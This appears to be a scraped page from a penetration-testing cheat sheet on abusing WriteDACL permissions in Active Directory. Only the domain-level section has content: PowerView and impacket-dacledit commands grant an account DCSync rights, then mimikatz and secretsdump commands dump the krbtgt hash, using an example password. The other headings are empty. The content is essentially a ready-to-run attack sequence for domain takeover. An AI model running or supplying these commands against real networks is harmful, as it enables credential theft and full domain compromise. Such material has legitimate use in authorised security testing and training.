WriteDACL
Over a Domain
Windows
# PowerView
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity x7331 -Rights DCSync
# DCSync
mimikatz.exe "lsadump::dcsync /domain:marvel.local /user:krbtgt /csv"Linux
# Assigning FullControl permissions over the user
impacket-dacledit -action write -rights DCSync -principal x7331 -target-dn dc=marvel,dc=local -dc-ip 10.10.10.5 marvel.local/x7331:'Passw0rd123!'
# DCSync
secretsdump.py -just-dc-user krbtgt marvel.local/x7331:'Passw0rd123!'@10.10.10.5Over a User
Windows
Linux
Over a Group
Windows
Linux
Over a Host
Windows
Over a GPO
Windows
Over an OU
Windows
Last updated